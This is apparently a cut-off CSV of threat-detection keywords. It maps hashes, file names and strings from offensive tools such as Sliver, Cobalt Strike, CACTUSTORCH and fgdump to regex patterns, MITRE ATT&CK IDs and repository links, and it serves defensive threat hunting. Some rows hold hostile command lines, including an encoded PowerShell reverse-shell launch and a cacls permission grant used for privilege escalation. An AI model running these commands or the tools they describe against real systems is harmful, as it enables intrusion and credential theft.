"*ca26faa4eec38d70b7237a0d1da33577295731d34c9aefa08ecdb2e8000cb4af*",".{0,1000}ca26faa4eec38d70b7237a0d1da33577295731d34c9aefa08ecdb2e8000cb4af.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*CA280845-1F10-4E65-9DE7-D9C6513BBD91*",".{0,1000}CA280845\-1F10\-4E65\-9DE7\-D9C6513BBD91.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","2","135","29","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*ca3227c4d833b341752927a08d6b41f0c3c81c03f41827859ecff6d008d45172*",".{0,1000}ca3227c4d833b341752927a08d6b41f0c3c81c03f41827859ecff6d008d45172.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ca32913db657697990e77b687cfdd25a3d40c45169802c874738581d3408549f*",".{0,1000}ca32913db657697990e77b687cfdd25a3d40c45169802c874738581d3408549f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*ca39c3b109987159e58bfa9feb0978f376837f177b1d3b19b49ce29e4d72d90a*",".{0,1000}ca39c3b109987159e58bfa9feb0978f376837f177b1d3b19b49ce29e4d72d90a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBGAGkAbABlACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBoAGUAbABsADMAZQByAC4AcABzADEA*",".{0,1000}cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBGAGkAbABlACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBoAGUAbABsADMAZQByAC4AcABzADEA.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","N/A","9","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBGAGkAbABlACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBoAGUAbABsADMAZQByAC4AcABzADEA*",".{0,1000}cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBGAGkAbABlACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBoAGUAbABsADMAZQByAC4AcABzADEA.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","shell spawning","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","0","N/A","N/A","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*cac03f25496480d919c18f2eae0bcbe2f80444345bbea088c7b61eddd3c0c152*",".{0,1000}cac03f25496480d919c18f2eae0bcbe2f80444345bbea088c7b61eddd3c0c152.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*cacaf377019b13a2e03c1751bf05b0d1513c160ee5325dd54fdf541885846e58*",".{0,1000}cacaf377019b13a2e03c1751bf05b0d1513c160ee5325dd54fdf541885846e58.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*cacfd6b17986292835f2cfa05562c0565a923a246677fc6eed01d426ba74300e*",".{0,1000}cacfd6b17986292835f2cfa05562c0565a923a246677fc6eed01d426ba74300e.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*cache_activedirectory.py*",".{0,1000}cache_activedirectory\.py.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","5","4","342","39","2024-03-28T10:30:53Z","2018-10-22T18:21:44Z" "*cachedump.exe*",".{0,1000}cachedump\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*cachedump64.exe*",".{0,1000}cachedump64\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*cacls C:\Windows\System32\wermgr.exe.local /e /g everyone:f*",".{0,1000}cacls\sC\:\\Windows\\System32\\wermgr\.exe\.local\s\/e\s\/g\severyone\:f.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*CACTUSTORCH*",".{0,1000}CACTUSTORCH.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1059 - T1055 - T1218 - T1027","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","N/A","N/A","10","988","223","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*CACTUSTORCH.cna*",".{0,1000}CACTUSTORCH\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","988","223","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*CACTUSTORCH.cs*",".{0,1000}CACTUSTORCH\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","988","223","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*CACTUSTORCH.hta*",".{0,1000}CACTUSTORCH\.hta.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","988","223","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*CACTUSTORCH.js*",".{0,1000}CACTUSTORCH\.js.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","988","223","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*CACTUSTORCH.vba*",".{0,1000}CACTUSTORCH\.vba.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","988","223","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*CACTUSTORCH.vbe*",".{0,1000}CACTUSTORCH\.vbe.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","988","223","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*CACTUSTORCH.vbs*",".{0,1000}CACTUSTORCH\.vbs.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","988","223","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*cad75780597ec7bda1505580fb4585123eb9685e0b759082d739c037c11e67be*",".{0,1000}cad75780597ec7bda1505580fb4585123eb9685e0b759082d739c037c11e67be.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*caeaaee0273746fee0c2f2e790f3215075a28a8ec6ffc22d18f82e68aea555a2*",".{0,1000}caeaaee0273746fee0c2f2e790f3215075a28a8ec6ffc22d18f82e68aea555a2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*caf0940d2bfc54a2efd684ccf47ebddb79da9331584b4781924e260372cca582*",".{0,1000}caf0940d2bfc54a2efd684ccf47ebddb79da9331584b4781924e260372cca582.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*caffix*amass*",".{0,1000}caffix.{0,1000}amass.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1590 - T1591 - T1592 - T1593 - T1594 - T1595","TA0009 - TA0011 - TA0007","N/A","N/A","Information Gathering","https://github.com/OWASP/Amass","1","0","N/A","N/A","10","11204","1816","2024-04-13T11:51:46Z","2018-07-10T16:05:08Z" "*caffix/amass*",".{0,1000}caffix\/amass.{0,1000}","offensive_tool_keyword","Amass","In-depth subdomain enumeration tool that performs scraping. recursive brute forcing06/01/2021 crawling of web archives06/01/2021 name altering and reverse DNS sweeping","T1593 - T1594 - T1595 - T1567 - T1569","TA0007 - TA0009 - TA0004 - TA0005 - TA0011","N/A","N/A","Information Gathering","https://github.com/OWASP/Amass","1","0","N/A","N/A","10","11204","1816","2024-04-13T11:51:46Z","2018-07-10T16:05:08Z" "*calc.zip /pass:xOVTzio*",".{0,1000}calc\.zip\s\/pass\:xOVTzio.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","9","10","993","156","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z" "*calebstewart/bypass-clm*",".{0,1000}calebstewart\/bypass\-clm.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","1","N/A","8","3","202","33","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z" "*calebstewart/pwncat*",".{0,1000}calebstewart\/pwncat.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*-CalendarNTLMLeak*",".{0,1000}\-CalendarNTLMLeak.{0,1000}","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","1","N/A","N/A","4","338","62","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z" "*Call KaynLoader in a remote thread*",".{0,1000}Call\sKaynLoader\sin\sa\sremote\sthread.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*Call KaynLoader in a remote thread*",".{0,1000}Call\sKaynLoader\sin\sa\sremote\sthread.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*CALLBACK_HASHDUMP*",".{0,1000}CALLBACK_HASHDUMP.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*CALLBACK_KEYSTROKES*",".{0,1000}CALLBACK_KEYSTROKES.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*CALLBACK_NETVIEW*",".{0,1000}CALLBACK_NETVIEW.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - 